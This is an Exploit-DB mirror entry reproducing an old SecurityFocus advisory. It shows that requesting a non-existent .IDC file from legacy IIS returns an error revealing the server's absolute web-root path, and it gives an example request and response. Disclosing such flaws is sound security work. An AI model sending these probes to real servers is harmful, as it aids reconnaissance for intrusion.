exploit-db-mirror/exploits/windows/remote/19239.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

10 lines
No EOL
423 B
Text

source: https://www.securityfocus.com/bid/299/info
The full physical path name for the IIS web server root directory may be obtained by attempting to view a non-existent .IDC file. The web server will return an error message that lists the absolute pathname of the "missing" .IDC file.
"http://www.someURL.com/hackme.idc"
will return:
Error Performing Query
Error processing file 'c:\inetpub\scripts\samples\hackme.idc'